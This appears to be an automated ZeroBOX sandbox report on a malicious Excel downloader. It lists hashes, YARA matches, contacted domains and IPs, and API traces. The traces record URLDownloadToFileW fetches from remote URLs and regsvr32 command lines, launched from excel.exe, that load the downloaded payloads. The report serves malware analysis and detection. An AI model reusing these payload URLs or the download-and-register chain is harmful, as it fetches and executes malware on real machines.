popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

deed-839243492.xls

Downloader MSOffice File
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Nov. 11, 2021, 12:39 p.m. Nov. 11, 2021, 12:46 p.m.
Size 237.0KB
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 18:19:34 2015, Last Saved Time/Date: Wed Nov 10 13:33:10 2021, Security: 0
MD5 0b50a56fee88f03fbc16300a1ef01ff5
SHA256 25b49850bdcf4c22528a96b9affa2f90b36e638faa1b86a30703dd91c126d058
CRC32 DAE32264
ssdeep 6144:IKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgNcftw6lZFT7kVWSuCMI6XujTm/18DgD+:EtrlZFT0bPLKVd8D9
Yara
  • Microsoft_Office_File_Downloader_Zero - Microsoft Office File Downloader
  • Microsoft_Office_File_Zero - Microsoft Office File

Name Response Post-Analysis Lookup
ezeetec.co.ke
A 79.143.176.196
79.143.176.196
coachingdeparejas.org.pe
A 198.38.91.247
198.38.91.247
IP Address Status Action
164.124.101.2 Active Moloch
198.38.91.247 Active Moloch
79.143.176.196 Active Moloch

Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2324
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6bd28000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2324
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b0e2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2564
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6c201000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2524
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6c201000
process_handle: 0xffffffff
1 0 0
cmdline regsvr32 C:\Datop\good.good
cmdline "C:\Windows\System32\regsvr32.exe" C:\Datop\good1.good
cmdline "C:\Windows\System32\regsvr32.exe" C:\Datop\good.good
cmdline regsvr32 C:\Datop\good1.good
cmdline "C:\Windows\System32\regsvr32.exe" C:\Datop\good2.good
cmdline regsvr32 C:\Datop\good2.good
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2324
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef70000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

URLDownloadToFileW

 url: https://ezeetec.co.ke/H9SzkzwjxTq/uk.html
stack_pivoted: 0
filepath_r: C:\Datop\good.good
filepath: C:\Datop\good.good
2148270085 0

URLDownloadToFileW

 url: https://coachingdeparejas.org.pe/9ox7krCzmBYL/uk.html
stack_pivoted: 0
filepath_r: C:\Datop\good1.good
filepath: C:\Datop\good1.good
2148270085 0

URLDownloadToFileW

 url: https://coachingdeparejas.org.pe/9ox7krCzmBYL/uk.html
stack_pivoted: 0
filepath_r: C:\Datop\good2.good
filepath: C:\Datop\good2.good
2148270085 0
parent_process excel.exe martian_process regsvr32 C:\Datop\good.good
parent_process excel.exe martian_process "C:\Windows\System32\regsvr32.exe" C:\Datop\good1.good
parent_process excel.exe martian_process "C:\Windows\System32\regsvr32.exe" C:\Datop\good.good
parent_process excel.exe martian_process regsvr32 C:\Datop\good1.good
parent_process excel.exe martian_process "C:\Windows\System32\regsvr32.exe" C:\Datop\good2.good
parent_process excel.exe martian_process regsvr32 C:\Datop\good2.good
file C:\Windows\System32\regsvr32.exe